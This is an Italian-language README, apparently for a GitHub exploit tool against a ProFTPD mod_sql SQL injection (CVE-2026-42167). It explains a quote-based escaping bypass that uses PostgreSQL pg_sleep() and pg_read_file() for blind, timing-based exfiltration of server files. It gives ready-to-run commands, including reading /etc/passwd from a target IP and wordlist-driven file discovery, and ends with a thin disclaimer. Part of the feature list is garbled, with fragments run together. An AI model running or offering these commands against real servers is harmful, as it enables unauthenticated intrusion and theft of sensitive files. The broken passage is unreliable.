
Exploit Python per CVE-2026-42167 (ProFTPD mod_sql). Include scansione automatica dei file ed esfiltrazione dati cieca basata sul timing.
Uno strumento professionale di ricerca sulla sicurezza per sfruttare la vulnerabilità CVE-2026-42167 nel modulo mod_sql di ProFTPD. Questo strumento esegue un'iniezione SQL non autenticata per esfiltrare file sensibili dal server tramite attacchi side-channel basati sul tempo.
"Nota: l'efficienza di questo strumento dipende dai permessi dell'utente PostgreSQL e dalla stabilità della rete."
CVE-2026-42167 è un difetto logico critico nella funzione is_escaped_text() di ProFTPD. Quando mod_sql è configurato per registrare i comandi USER, un attaccante può bypassare l'escape SQL fornendo un input che inizia e termina con un apice singolo ('). Questo strumento sfrutta questo bypass per eseguire comandi specifici di PostgreSQL.
USERpg_sleep() e pg_read_file() per uno sfruttamento affidabile./**/) per bypassare i meccanismi di filtraggio degli spazi.git clone https://github.com/efeanilarslan/CVE-2026-42167-Exploit
cd CVE-2026-42167-Exploit
pip install -r requirements.txt # (Nessuna dipendenza esterna richiesta)
python3 proftpd_master_exploit.py -t <IP_TARGET> -p 2121
python3 proftpd_master_exploit.py -t <IP_TARGET> -f /etc/passwd
python3 proftpd_master_exploit.py -t <IP_TARGET> -w common.txt -s 1.5
| Flag | Descrizione | Predefinito |
|---|---|---|
-t | Indirizzo IP del target | Obbligatorio |
-p | Porta FTP del target | 2121 |
-s | Durata del sleep per l'attacco temporale | 2.0s |
-w | Wordlist per la scoperta dei file | Nessuno |
-f | Percorso del file specifico da esfiltrare | Nessuno |
Questo strumento è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati. Lo sviluppatore non è responsabile per qualsiasi uso improprio o danno causato da questo programma. Usalo in modo responsabile.